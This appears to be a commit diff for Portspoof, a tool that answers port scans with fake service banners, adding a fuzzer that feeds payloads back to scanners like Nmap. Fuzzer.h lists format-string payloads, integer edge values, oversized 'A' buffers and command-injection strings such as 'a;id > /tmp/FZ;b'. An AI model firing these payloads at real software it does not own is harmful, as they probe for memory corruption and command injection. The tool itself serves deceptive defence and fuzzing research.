major update

src/Configuration.cpp

@@ -8,12 +8,9 @@ Configuration::Configuration()
 	bind_ip=std::string();
 	port=DEFAULT_PORT;	
 	opts=0;
-	
-	
 	nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);	
 	fuzzpayload_file = std::string(FUZZ_FILE_PAYLOAD);	
-	counter=0;
-	
+		
 	return;
 }
 
@@ -28,13 +25,14 @@ void  Configuration::usage(void)
 	"Portspoof - service signature obfuscator.\n\n"
 	  "-i             bind to a user defined IP address\n"
 	  "-p			  bind to a user defined PORT number\n"
-	  "-f			  custom signture file\n"
+	  "-s			  custom signture file\n"
 	  "-c			  configuration file\n"
 	  "-l			  log port scanning alerts to a file\n"
 	  "-d			  disable syslog\n"
 	  "-v			  be verbose\n"
-	  "-x			  fuzz\n"
-	  "-y			  nmap wrap fuzz\n"
+	  "-f			  read fuzz payload list\n"
+	  "-1			  generate fuzzing payloads\n"
+	  "-n			  nmap wrap fuzz signatures\n"
 	  "-h			  display this help and exit\n\n"
 	"Without any OPTION - use default values and continue\n");
 	
@@ -46,7 +44,7 @@ bool Configuration::processArgs(int argc, char** argv)
 	int	ch;
 	extern char *__progname;
 	
-	while ((ch = getopt(argc, argv,"l:i:p:f:c:y:x:dvh")) != -1) {
+	while ((ch = getopt(argc, argv,"l:i:p:s:c:f:n:dvh123")) != -1) {
 		switch (ch) {
 		case 'i':
 			this->bind_ip = std::string(optarg);
@@ -56,7 +54,7 @@ bool Configuration::processArgs(int argc, char** argv)
 			this->port  = atoi(optarg);
 			this->opts[OPT_PORT]=1;
 			break;
-		case 'f':
+		case 's':
 			this->signaturefile  = std::string(optarg);
 			this->opts[OPT_SIG_FILE]=1;
 			
@@ -79,16 +77,28 @@ bool Configuration::processArgs(int argc, char** argv)
 			this->logfile  = std::string(optarg);
 			fprintf(stdout,"-> Using log file %s\n",this->logfile.c_str());
 			break;	
-		case 'x':
-		this->opts[OPT_FUZZ]=1;
+		case 'f':
+		this->opts[OPT_FUZZ_WORDLIST]=1;
 			this->fuzzpayload_file=std::string(optarg);
-			fprintf(stdout,"-> Fuzzing mode!\n");
+			fprintf(stdout,"-> Reading fuzzing payloads from a file!\n");
 			break;
-		case 'y':
+		case 'n':
 			this->opts[OPT_FUZZ_NMAP]=1;
 			this->nmapfuzzsignatures_file=std::string(optarg);
-			fprintf(stdout,"-> NMAP Fuzzing mode!\n");
+			fprintf(stdout,"-> NMAP wrapper mode!\n");
 			break;
+		case '1':
+			this->opts[OPT_FUZZ_INTERNAL]=1;
+			fprintf(stdout,"-> Generate fuzzing payloads!\n");
+			break;
+		case '2':
+			this->opts[OPT_NOT_NMAP_SCANNER]=1;
+			fprintf(stdout,"-> Switching to simple reply mode (anything apart from Nmap)!\n");
+			break;
+		case '3':
+			this->opts[OPT_FUZZ_RANDOM]=1;
+			fprintf(stdout,"-> Random int fuzzing!\n");
+			break;			
 		case 'h':
 			this->usage();
 			break;
@@ -105,6 +115,10 @@ bool Configuration::processArgs(int argc, char** argv)
 		fprintf(stdout,"-> No parameters - using default values.\n");
 	}
 			
+	if(this->getConfigValue(OPT_FUZZ_NMAP) ||this->getConfigValue(OPT_FUZZ_WORDLIST) || this->getConfigValue(OPT_FUZZ_INTERNAL))
+		this->fuzzer=new Fuzzer(this);
+	
+	
 	return 0;
 }
 
@@ -116,6 +130,15 @@ std::string Configuration::getSignatureFile()
 {
 	return this->signaturefile;
 	
+}
+std::string Configuration::getNmapfuzzSignaturesFile()
+{
+	return this->nmapfuzzsignatures_file;
+}
+std::string Configuration::getFuzzPayloadFile()
+{
+	return this->fuzzpayload_file;
+	
 }
 std::string Configuration::getLogFile()
 {
@@ -135,7 +158,7 @@ unsigned short int Configuration::getPort()
 std::vector<char> Configuration::mapPort2Signature(unsigned short port)
 {	
 	/*
-	if(this->opts&OPT_FUZZ)
+	if(this->opts&OPT_FUZZ_WORDLIST
 	{
 		
 		std::string input_line;
@@ -148,10 +171,10 @@ std::vector<char> Configuration::mapPort2Signature(unsigned short port)
 		
 	}
 	*/
-	if(this->opts[OPT_FUZZ_NMAP])
+	if(this->opts[OPT_FUZZ_NMAP] || this->opts[OPT_FUZZ_INTERNAL] || this->opts[OPT_FUZZ_WORDLIST])
 	{
 		std::vector<char> result_vector;		
-		result_vector=this->GetFUZZ();
+		result_vector=this->fuzzer->GetFUZZ();
 		return result_vector;
 	}
 	else
@@ -257,81 +280,3 @@ bool Configuration::readConfigFile()
 	
 }
 
-
-bool Configuration::PrepareFuzzer()
-{
-	
-		this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
-		if ( this->fp_payloads == NULL) {
-		    fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
-			return 1;
-		}
-		
-		/////
-		
-		FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
-		if (fp == NULL) {
-			  fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
-			return 1;
-		}
-
-		char buf_file[BUFSIZE];
-		while (fgets(buf_file, BUFSIZE, fp))
-		nmapfuzzsignatures.push_back(std::string(buf_file));
-		fclose(fp);
-		
-	    fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
-		
-		return 0;
-}
-
-
-
-
-std::vector<char>  Configuration::GetFUZZ()
-{
-	
-	
-	char buf_file[BUFSIZE];
-	std::string input_wrapped,input_wrapped2;
-	std::vector<char> result_vector;
-
-	
-	if(this->counter%this->nmapfuzzsignatures.size()==0)
-	{
-		
-	
-	if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
-	{
-		fprintf(stdout,"EOF of payload file\n");
-		fflush(stdout);
-	}
-	this->input_line=std::string(buf_file);
-	this->input_line.erase(input_line.size() - 1);//remove \n
-	
-	}
-	
-	
-	input_wrapped=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
-	input_wrapped2=Utils::unescape(input_wrapped);
-	
-	
-	this->counter++;
-
-	for(int i=0; i<input_wrapped2.length();i++)
-		result_vector.push_back(input_wrapped2[i]);
-	
-	return result_vector;
-	
-	
-}
-
-/*
-std::string input_line;
-std::getline(std::cin, input_line);
-
-
-for(int i=0; i<input_line.length();i++)
-	result_vector.push_back(input_line[i]);
-return result_vector;
-*/

src/Configuration.h

@@ -8,7 +8,7 @@
 #define LOG_FILE "portspoof.log"
 #define CONF_FILE "portspoof.conf"
 #define SIGNATURE_FILE "signatures"
-#define OPT_FUZZ 1
+#define OPT_FUZZ_WORDLIST 1
 #define OPT_IP 2
 #define OPT_PORT 3
 #define OPT_DEBUG 4
@@ -17,7 +17,9 @@
 #define OPT_SYSLOG_DIS 7
 #define OPT_CONFIG_FILE 8
 #define OPT_FUZZ_NMAP 9
-
+#define OPT_FUZZ_INTERNAL 10
+#define OPT_NOT_NMAP_SCANNER 11
+#define OPT_FUZZ_RANDOM 12
 
 #define MAX_PORTS 65535
 
@@ -48,6 +50,9 @@ using namespace std;
 typedef map < unsigned short, std::vector<char> > Port_Signature_Map;
 typedef vector < string > Raw_Signatures_Vector;
 typedef vector < string > Nmap_Fuzz_Vector;
+class Fuzzer;
+
+#include "Fuzzer.h"
 
 
 class Configuration {
@@ -57,39 +62,31 @@ class Configuration {
 		std::string logfile;
 		std::string bind_ip;
 		unsigned short int port;
-		bitset<10> opts;
-		
-		unsigned short ifuzz;		
+		bitset<20> opts;
+		Fuzzer* fuzzer;
+		std::string nmapfuzzsignatures_file;
+		std::string fuzzpayload_file;
 		Port_Signature_Map portsignatureemap;
 		Raw_Signatures_Vector rawsignatures;
 		
-		//fuzzing part
-		std::string nmapfuzzsignatures_file;
-		std::string fuzzpayload_file;
-		Nmap_Fuzz_Vector nmapfuzzsignatures;
-		FILE *fp_payloads;
-		int counter;
-		std::string input_line;
 		
 	public:
 		Configuration();
-		
+		void usage(void);
  		bool processArgs(int argc, char** argv);
 		bool readConfigFile();
 		std::vector<char> mapPort2Signature(unsigned short port);
-		void usage(void);
-		bool getConfigValue(int value);
+		bool processSignatureFile();
+		
+		//getters
 		std::string getConfigFile();
 		std::string getSignatureFile();
 		std::string getLogFile();
 		std::string getBindIP();
+		std::string getNmapfuzzSignaturesFile();
+		std::string getFuzzPayloadFile();
+		bool getConfigValue(int value);
 		unsigned short int getPort();
-		bool processSignatureFile();
-		
-		//fuzzing part
-		bool PrepareFuzzer();
-		std::vector<char> GetFUZZ();
-		
 			
 };
 

src/Fuzzer.cpp

@@ -0,0 +1,182 @@
+#include "Fuzzer.h"
+
+Fuzzer::Fuzzer()
+{	
+	
+
+	return;
+}
+
+Fuzzer::Fuzzer(Configuration* configuration)
+{	
+	
+	this->configuration = configuration;
+	this->nmapfuzzsignatures_file = configuration->getNmapfuzzSignaturesFile();
+	this->fuzzpayload_file = configuration->getFuzzPayloadFile();
+	this->counter=0;
+	this->payload_counter=0;
+	this->PrepareFuzzer();
+	
+	return;
+}
+
+
+bool Fuzzer::PrepareFuzzer()
+{
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+	{
+		
+	this->fp_payloads=fopen(this->fuzzpayload_file.c_str(), "r");
+	if ( this->fp_payloads == NULL) {
+	    fprintf(stdout,"Error opening payload file: %s \n",this->fuzzpayload_file.c_str());
+		return 1;
+	}
+	
+	}
+	/////
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+	{
+		
+	FILE *fp = fopen(this->nmapfuzzsignatures_file.c_str(), "r");
+	if (fp == NULL) {
+		  fprintf(stdout,"Error opening nmap signature file: %s \n",this->nmapfuzzsignatures_file.c_str());
+		return 1;
+	}
+
+	char buf_file[BUFSIZE];
+	while (fgets(buf_file, BUFSIZE, fp))
+	nmapfuzzsignatures.push_back(std::string(buf_file));
+	fclose(fp);
+	fprintf(stdout,"-> Nmap signatures read: %d \n",this->nmapfuzzsignatures.size());
+    
+	}
+	
+	return 0;
+			
+}
+
+std::vector<char> Fuzzer::intToBytes(int paramInt)
+{
+     vector<char> arrayOfByte(4);
+     for (int i = 0; i < 4; i++)
+         arrayOfByte[3 - i] = (paramInt >> (i * 8));
+     return arrayOfByte;
+}
+
+
+std::vector<char> Fuzzer::shortToBytes(unsigned short paramInt)
+{
+     vector<char> arrayOfByte(2);
+     for (int i = 0; i < 2; i++)
+         arrayOfByte[1 - i] = (paramInt >> (i * 4));
+     return arrayOfByte;
+}
+
+std::vector<char> Fuzzer::GenerateFuzzPayload()
+{
+	std::vector<char> result_vector;
+	std::string str;
+	
+	/*
+	for(int i=0;i<255;i++)
+		result_vector.push_back(i);
+	
+	return result_vector;
+	
+	
+		
+	if(this->configuration->getConfigValue(OPT_FUZZ_RANDOM))
+		{
+			this->payload_counter++;
+			return this->shortToBytes((unsigned short)this->payload_counter);
+			
+		}
+		*/
+
+	if(this->payload_counter<10)
+	{
+		for(int i=0;i<4000*(this->payload_counter+1);i++)
+			result_vector.push_back(*(fuzz_oracle[0]));
+	}
+	else
+	{
+		
+		str=std::string(fuzz_oracle[this->payload_counter-9]);
+		result_vector=Utils::str2vector(str);		
+	}
+
+	this->payload_counter++;
+	
+	if(this->payload_counter>=25)
+		this->payload_counter=0;
+		
+	return result_vector;
+	
+}
+
+std::vector<char>  Fuzzer::GetFUZZ()
+{
+	std::vector<char> result_vector;
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+	{
+		
+	
+		if(this->counter%this->nmapfuzzsignatures.size()==0)
+		{
+	
+			char buf_file[BUFSIZE];
+			std::string str;
+	
+			if(fgets(buf_file, BUFSIZE, this->fp_payloads)==NULL)
+			{
+					fprintf(stdout,"EOF of payload file\n");
+					fflush(stdout);
+			}
+			
+			str=std::string(buf_file);
+			str.erase(str.size() - 1);//remove \n
+			this->input_line=Utils::str2vector(str);
+	
+		}
+	
+		this->counter++;
+	
+	}
+	else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+	{	
+		result_vector=this->GenerateFuzzPayload();
+	}
+	else
+		fprintf(stdout,"Fuzz - shouldn't be here...\n");
+			
+	
+	if(this->configuration->getConfigValue(OPT_FUZZ_NMAP))
+	{
+		
+		if(this->configuration->getConfigValue(OPT_FUZZ_WORDLIST))
+			result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],this->input_line);
+		else if(this->configuration->getConfigValue(OPT_FUZZ_INTERNAL))
+			result_vector=Utils::wrapNMAP(this->nmapfuzzsignatures[this->counter%this->nmapfuzzsignatures.size()],result_vector);
+		
+		result_vector=Utils::unescape(result_vector);	
+		
+	}
+
+	return result_vector;
+	
+	
+}
+
+
+/*
+std::string input_line;
+std::getline(std::cin, input_line);
+
+
+for(int i=0; i<input_line.length();i++)
+	result_vector.push_back(input_line[i]);
+return result_vector;
+*/

src/Fuzzer.h

@@ -0,0 +1,75 @@
+#ifndef FUZZER_H
+#define FUZZER_H
+
+#include <string>
+#include <stdio.h>
+#include <ctype.h>
+#include <pcap.h>
+#include <map>
+#include <vector>
+#include <sstream>
+#include <unistd.h>
+#include <algorithm> 
+#include <iostream>
+#include <ctime> 
+#include <pthread.h>
+#include <iostream>
+#include <string>
+#include <iostream>
+#include <fstream>
+#include <sstream>
+
+#include "Utils.h"
+#include "Configuration.h"
+
+using namespace std;
+
+
+ static const char* const   fuzz_oracle[]=
+{
+"A",
+"%n%n%n%n%n",
+"%%20n",
+"%n%p%s%d%x",
+"%.1024d",
+"%.2049d",
+"-1",
+"32767",
+"65535",
+"-2147483647",
+"0xffffffff",
+"a|id > /tmp/FZ|b",
+"a`id > /tmp/FZ`b",
+"a'id > /tmp/FZ'b",
+"a;id > /tmp/FZ;b",
+"a&&id > /tmp/FZ&&b"
+};
+
+
+class Fuzzer{
+	private:
+	
+		std::string nmapfuzzsignatures_file;
+		std::string fuzzpayload_file;
+		Nmap_Fuzz_Vector nmapfuzzsignatures;
+		FILE *fp_payloads;
+		std::vector<char> input_line;
+		Configuration* configuration;
+		int counter;
+		int payload_counter;
+		int nmapfuzzsignatures_size;
+		
+	public:
+		Fuzzer();
+		Fuzzer(Configuration* configuration);
+		bool processSignatureFile();
+		std::vector<char> GetFUZZ();
+		std::vector<char> GenerateFuzzPayload();		
+		std::vector<char> intToBytes(int paramInt);
+		std::vector<char> shortToBytes(unsigned short paramInt);
+				
+		bool PrepareFuzzer();
+};
+
+
+#endif

src/Utils.cpp

@@ -44,15 +44,42 @@ void Utils::hexdump(void *mem, unsigned int len)
     }
 }
 
-string Utils::wrapNMAP(string wrapper,string payload)
+std::vector<char> Utils::wrapNMAP(string wrapper,std::vector<char> payload)
 {
-	std::stringstream ss;	
+	stringstream ss;	
+	string str;
+	std::vector<char> result_vector;
+	
 	ss<<wrapper.substr(0,wrapper.find("__FUZZ__"));
-	ss<<payload;
+	str=ss.str();
+	
+	for(int i=0; i<str.length();i++)
+		result_vector.push_back(str[i]);	
+	
+	result_vector.insert(result_vector.end(),payload.begin(),payload.end());
+	
+	ss.str("");
 	ss<<wrapper.substr(wrapper.find("__FUZZ__")+strlen("__FUZZ__"),wrapper.size());
-	return ss.str();
+	
+	str=ss.str();
+	
+	for(int i=0; i<str.length();i++)
+		result_vector.push_back(str[i]);		
+	
+	return result_vector;
 }
 
+std::vector<char> Utils::str2vector( std::string& s)
+{
+	std::vector<char> result_vector;
+	
+	for(int i=0; i<s.length();i++)
+		result_vector.push_back(s[i]);
+		
+	return result_vector;
+	
+	
+}
 int Utils::isNumeric (const char * s)
 {
     if (s == NULL || *s == '\0' || isspace(*s))
@@ -63,10 +90,10 @@ int Utils::isNumeric (const char * s)
 }
 
 
-std::string Utils::unescape(string& s)
+std::vector<char> Utils::unescape(std::vector<char> & s)
 {
-  string res;
-  string::const_iterator it = s.begin();
+  std::vector<char> res;
+  vector<char>::const_iterator it = s.begin();
   while (it != s.end())
   {
     char c = *it++;
@@ -75,13 +102,15 @@ std::string Utils::unescape(string& s)
       switch (*it++) {
       case 'n': c = '\n'; break;
       case 'r': c = '\r'; break;
+      case 't': c = '\t'; break;
+
       // all other escapes
       default: 
         // invalid escape sequence - skip it. alternatively you can copy it as is, throw an exception...
         continue;
       }
     }
-    res += c;
+    res.push_back(c);
   }
 
   return res;

src/Utils.h

@@ -11,6 +11,7 @@
 #include <string>
 #include <sstream>
 #include <iostream>
+#include <vector>
 
 
 #ifndef HEXDUMP_COLS
@@ -27,8 +28,10 @@ class Utils {
 		static void hexdump(void *mem, unsigned int len);
 		static int isNumeric (const char * s);
 		static char* get_substring_value(char* str);
-		static string wrapNMAP(string wrapper,string payload);
-		static std::string unescape( string& s);
+		static std::vector<char> wrapNMAP(string wrapper,std::vector<char> payload);
+		static std::vector<char> unescape( std::vector<char>& s);
+		static std::vector<char> str2vector( std::string& s);
+		
 		
 };
 

src/connection.cpp

@@ -69,8 +69,8 @@ void nonblock(int sockfd)
 void* process_connection(void *arg)
 {
 	int tid =  *((int*)(&arg));
-	int len,i;  
-	std:string str;
+	//int len;  
+	string str;
 	char buffer;
 	int original_port=DEFAULT_PORT;
 	int n = 0;
@@ -82,7 +82,7 @@ void* process_connection(void *arg)
 	while(1) {
 
 		sleep(1);
-		for(i = 0; i < MAX_CLIENT_PER_THREAD; i++)
+		for(int i = 0; i < MAX_CLIENT_PER_THREAD; i++)
 		{
 				
 			if(threads[tid].clients[i] != 0)
@@ -90,7 +90,11 @@ void* process_connection(void *arg)
 		     
 				timestamp = time(NULL); 
 				
-			 	n = recv(threads[tid].clients[i], &buffer,1, 0);			
+				if(configuration->getConfigValue(OPT_NOT_NMAP_SCANNER))
+					n = 1; // just reply...
+				else
+					n = recv(threads[tid].clients[i], &buffer,1, 0);	
+			 		
 			
 				// deal with different recv buffer size
 				if(n == 0){
@@ -127,7 +131,6 @@ void* process_connection(void *arg)
 					threads[tid].client_count--;
 					pthread_mutex_unlock(&new_connection_mutex);
 				
-
 				}
 				else if(n < 0){
 
@@ -177,7 +180,6 @@ void* process_connection(void *arg)
 				else
 				{
 					
-
 				#ifdef OSX
 				//  BSD
 							original_port = ntohs(peer_sockaddr.sin_port);
@@ -208,16 +210,15 @@ void* process_connection(void *arg)
 				int buffertosendsize=vectsignature.size();
 				char* buffertosend= (char*)malloc(buffertosendsize);
 				
-				for(int i=0; i<buffertosendsize;i++)
-					buffertosend[i]=vectsignature[i];
+				for(int j=0; j<buffertosendsize;j++)
+					buffertosend[j]=vectsignature[j];
 					
 			  	if(configuration->getConfigValue(OPT_DEBUG))
 				{
 					
 				
 				fprintf(stdout,"signature sent -> ");	
-				unsigned int t=0;
-				for(;t<buffertosendsize;t++)
+				for(int t=0;t<buffertosendsize;t++)
 				{
 						if(*(buffertosend+t)==0)
 							fprintf(stdout,"\\00");

src/log.cpp

@@ -12,7 +12,7 @@ void log_create(const char* file){
 	
 	FILE *fp = fopen(configuration->getLogFile().c_str(), "a");
 		if (fp == NULL) {
-			FILE *fp = fopen(configuration->getLogFile().c_str(), "w");
+			fp = fopen(configuration->getLogFile().c_str(), "w");
 		}
 	
 	fclose(fp);

src/main.cpp

@@ -121,25 +121,25 @@ int main(int argc, char** argv){
 
 		/* Find the properties for the device */
 		if (pcap_lookupnet(configuration->getDevice().c_str(), &net, &mask, errbuf) == -1) {
-			printf("Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
+			fprintf(stdout,"Couldn't get netmask for device %s: %s\n", configuration->getDevice().c_str(), errbuf);
 			net = 0;
 			mask = 0;
 		}
 		
 		//promisc mode.
 		if ( (descr = pcap_open_live(configuration->getDevice().c_str(), BUFSIZ, 1,  512, errbuf)) == NULL){
-	    	printf("ERROR: %s\n", errbuf);
+	    	fprintf(stdout,"ERROR: %s\n", errbuf);
 	    	exit(1);
 	 	}
 	
 		cout<<"Promisc mode set"<<endl;
 	
 		if (pcap_compile(descr, &fp, configuration->getFilter().c_str(), 0, net) == -1) { 
-			 printf("Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
+			 fprintf(stdout,"Couldn't parse filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
 	    	 exit(1);
 		 }
 		 if (pcap_setfilter(descr, &fp) == -1) {
-			 printf("Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
+			 fprintf(stdout,"Couldn't install filter %s: %s\n", configuration->getFilter().c_str(), pcap_geterr(descr));
 	    	 exit(1);
 		 }
 	 	

src/portspoof.cpp

@@ -84,7 +84,7 @@ int main(int argc, char **argv)
 
 	int sockd,newsockfd;
 	int addrlen;
-	int pid;
+	//int pid;
 	struct sockaddr_in my_name, peer_name;
 	int status;
 
@@ -99,7 +99,8 @@ int main(int argc, char **argv)
 		
 	if(configuration->readConfigFile())
 		exit(1);
-		
+	
+	/*	
 	if(configuration->getConfigValue(OPT_FUZZ_NMAP))
 	{
 		if(configuration->PrepareFuzzer())
@@ -112,7 +113,7 @@ int main(int argc, char **argv)
 		fprintf(stdout,"-> Preparing fuzzer!\n");
 		
 	}
-
+	*/
 	
 
 	//check log file

src/revregex.cpp

@@ -279,6 +279,8 @@ char * fill_specialchars(char * str,int* param_len, int start_offset,int end_off
 	int dot='.';
 	int newline='n';
 	int creturn='r';
+	int tab='t';
+	
 	
 	char* tmp;	// tmp string for merging
 	int tmplen=end_offset-start_offset;
@@ -326,6 +328,12 @@ char * fill_specialchars(char * str,int* param_len, int start_offset,int end_off
 					tmpi++;
 					i++;	
 			}
+			else if(str[i]==bslash && i+1!=end_offset && str[i+1]==tab )
+			{
+					tmp[tmpi]='\t';
+					tmpi++;
+					i++;	
+			}
 			else if(str[i]==dot && i!=start_offset && str[i-1]!=bslash)
 			{
 

src/src/.deps/connection.Po

@@ -0,0 +1 @@
+# dummy

src/src/.deps/connection.Tpo

@@ -0,0 +1,231 @@
+connection.o connection.o: connection.c connection.h \
+  /usr/include/sys/socket.h /usr/include/sys/types.h \
+  /usr/include/sys/appleapiopts.h /usr/include/sys/cdefs.h \
+  /usr/include/sys/_symbol_aliasing.h \
+  /usr/include/sys/_posix_availability.h /usr/include/machine/types.h \
+  /usr/include/i386/types.h /usr/include/i386/_types.h \
+  /usr/include/sys/_types.h /usr/include/machine/_types.h \
+  /usr/include/machine/endian.h /usr/include/i386/endian.h \
+  /usr/include/sys/_endian.h /usr/include/libkern/_OSByteOrder.h \
+  /usr/include/libkern/i386/_OSByteOrder.h /usr/include/sys/_structs.h \
+  /usr/include/machine/_param.h /usr/include/i386/_param.h \
+  /usr/include/Availability.h /usr/include/AvailabilityInternal.h \
+  /usr/include/assert.h /usr/include/net/if.h /usr/include/net/if_var.h \
+  /usr/include/stdint.h /usr/include/sys/time.h /usr/include/time.h \
+  /usr/include/_types.h /usr/include/_structs.h \
+  /usr/include/sys/_select.h /usr/include/sys/queue.h \
+  /usr/include/sys/ioctl.h /usr/include/sys/ttycom.h \
+  /usr/include/sys/ioccom.h /usr/include/sys/filio.h \
+  /usr/include/sys/sockio.h /usr/include/sys/stat.h \
+  /usr/include/netinet/in.h /usr/include/netinet6/in6.h \
+  /usr/include/sys/sysctl.h /usr/include/sys/ucred.h \
+  /usr/include/sys/param.h /usr/include/sys/syslimits.h \
+  /usr/include/machine/param.h /usr/include/i386/param.h \
+  /usr/include/i386/_param.h \
+  /usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h \
+  /usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h \
+  /usr/include/limits.h /usr/include/machine/limits.h \
+  /usr/include/i386/limits.h /usr/include/i386/_limits.h \
+  /usr/include/sys/signal.h /usr/include/machine/signal.h \
+  /usr/include/i386/signal.h /usr/include/i386/_structs.h \
+  /usr/include/machine/_structs.h /usr/include/mach/i386/_structs.h \
+  /usr/include/bsm/audit.h /usr/include/mach/port.h \
+  /usr/include/mach/boolean.h /usr/include/mach/machine/boolean.h \
+  /usr/include/mach/i386/boolean.h /usr/include/mach/machine/vm_types.h \
+  /usr/include/mach/i386/vm_types.h /usr/include/mach/i386/vm_param.h \
+  /usr/include/sys/proc.h /usr/include/sys/select.h \
+  /usr/include/sys/lock.h /usr/include/sys/event.h /usr/include/sys/vm.h \
+  /usr/include/netdb.h /usr/include/fcntl.h /usr/include/sys/fcntl.h \
+  /usr/include/err.h /usr/include/errno.h /usr/include/sys/errno.h \
+  /usr/include/stdio.h /usr/include/secure/_stdio.h \
+  /usr/include/secure/_common.h revregex.h /usr/include/string.h \
+  /usr/include/strings.h /usr/include/secure/_string.h \
+  /usr/include/stdlib.h /usr/include/sys/wait.h \
+  /usr/include/sys/resource.h /usr/include/alloca.h /usr/include/ctype.h \
+  /usr/include/runetype.h threads.h porspoof.h
+
+connection.h:
+
+/usr/include/sys/socket.h:
+
+/usr/include/sys/types.h:
+
+/usr/include/sys/appleapiopts.h:
+
+/usr/include/sys/cdefs.h:
+
+/usr/include/sys/_symbol_aliasing.h:
+
+/usr/include/sys/_posix_availability.h:
+
+/usr/include/machine/types.h:
+
+/usr/include/i386/types.h:
+
+/usr/include/i386/_types.h:
+
+/usr/include/sys/_types.h:
+
+/usr/include/machine/_types.h:
+
+/usr/include/machine/endian.h:
+
+/usr/include/i386/endian.h:
+
+/usr/include/sys/_endian.h:
+
+/usr/include/libkern/_OSByteOrder.h:
+
+/usr/include/libkern/i386/_OSByteOrder.h:
+
+/usr/include/sys/_structs.h:
+
+/usr/include/machine/_param.h:
+
+/usr/include/i386/_param.h:
+
+/usr/include/Availability.h:
+
+/usr/include/AvailabilityInternal.h:
+
+/usr/include/assert.h:
+
+/usr/include/net/if.h:
+
+/usr/include/net/if_var.h:
+
+/usr/include/stdint.h:
+
+/usr/include/sys/time.h:
+
+/usr/include/time.h:
+
+/usr/include/_types.h:
+
+/usr/include/_structs.h:
+
+/usr/include/sys/_select.h:
+
+/usr/include/sys/queue.h:
+
+/usr/include/sys/ioctl.h:
+
+/usr/include/sys/ttycom.h:
+
+/usr/include/sys/ioccom.h:
+
+/usr/include/sys/filio.h:
+
+/usr/include/sys/sockio.h:
+
+/usr/include/sys/stat.h:
+
+/usr/include/netinet/in.h:
+
+/usr/include/netinet6/in6.h:
+
+/usr/include/sys/sysctl.h:
+
+/usr/include/sys/ucred.h:
+
+/usr/include/sys/param.h:
+
+/usr/include/sys/syslimits.h:
+
+/usr/include/machine/param.h:
+
+/usr/include/i386/param.h:
+
+/usr/include/i386/_param.h:
+
+/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/limits.h:
+
+/usr/llvm-gcc-4.2/bin/../lib/gcc/i686-apple-darwin11/4.2.1/include/syslimits.h:
+
+/usr/include/limits.h:
+
+/usr/include/machine/limits.h:
+
+/usr/include/i386/limits.h:
+
+/usr/include/i386/_limits.h:
+
+/usr/include/sys/signal.h:
+
+/usr/include/machine/signal.h:
+
+/usr/include/i386/signal.h:
+
+/usr/include/i386/_structs.h:
+
+/usr/include/machine/_structs.h:
+
+/usr/include/mach/i386/_structs.h:
+
+/usr/include/bsm/audit.h:
+
+/usr/include/mach/port.h:
+
+/usr/include/mach/boolean.h:
+
+/usr/include/mach/machine/boolean.h:
+
+/usr/include/mach/i386/boolean.h:
+
+/usr/include/mach/machine/vm_types.h:
+
+/usr/include/mach/i386/vm_types.h:
+
+/usr/include/mach/i386/vm_param.h:
+
+/usr/include/sys/proc.h:
+
+/usr/include/sys/select.h:
+
+/usr/include/sys/lock.h:
+
+/usr/include/sys/event.h:
+
+/usr/include/sys/vm.h:
+
+/usr/include/netdb.h:
+
+/usr/include/fcntl.h:
+
+/usr/include/sys/fcntl.h:
+
+/usr/include/err.h:
+
+/usr/include/errno.h:
+
+/usr/include/sys/errno.h:
+
+/usr/include/stdio.h:
+
+/usr/include/secure/_stdio.h:
+
+/usr/include/secure/_common.h:
+
+revregex.h:
+
+/usr/include/string.h:
+
+/usr/include/strings.h:
+
+/usr/include/secure/_string.h:
+
+/usr/include/stdlib.h:
+
+/usr/include/sys/wait.h:
+
+/usr/include/sys/resource.h:
+
+/usr/include/alloca.h:
+
+/usr/include/ctype.h:
+
+/usr/include/runetype.h:
+
+threads.h:
+
+porspoof.h:

src/src/.deps/portspoof-connection.Po

@@ -0,0 +1 @@
+# dummy

src/src/.deps/portspoof-portspoof.Po

@@ -0,0 +1 @@
+# dummy

src/src/.deps/portspoof-revregex.Po

@@ -0,0 +1 @@
+# dummy

src/src/.deps/portspoof.Po

@@ -0,0 +1 @@
+# dummy

src/src/.deps/revregex.Po

@@ -0,0 +1 @@
+# dummy

src/src/Configuration.cpp

@@ -0,0 +1,282 @@
+#include "Configuration.h"
+
+Configuration::Configuration()
+{	
+	configfile = std::string(CONF_FILE);
+	signaturefile = std::string(SIGNATURE_FILE);
+	logfile = std::string(LOG_FILE);
+	bind_ip=std::string();
+	port=DEFAULT_PORT;	
+	opts=0;
+	nmapfuzzsignatures_file = std::string(NMAP_FUZZ_FILE_SIG);	
+	fuzzpayload_file = std::string(FUZZ_FILE_PAYLOAD);	
+		
+	return;
+}
+
+bool Configuration::getConfigValue(int value)
+{
+	return this->opts[value];
+}
+
+void  Configuration::usage(void)
+{
+	fprintf(stdout,"Usage: portspoof [OPTION]...\n"
+	"Portspoof - service signature obfuscator.\n\n"
+	  "-i             bind to a user defined IP address\n"
+	  "-p			  bind to a user defined PORT number\n"
+	  "-s			  custom signture file\n"
+	  "-c			  configuration file\n"
+	  "-l			  log port scanning alerts to a file\n"
+	  "-d			  disable syslog\n"
+	  "-v			  be verbose\n"
+	  "-f			  read fuzz payload list\n"
+	  "-1			  generate fuzzing payloads\n"
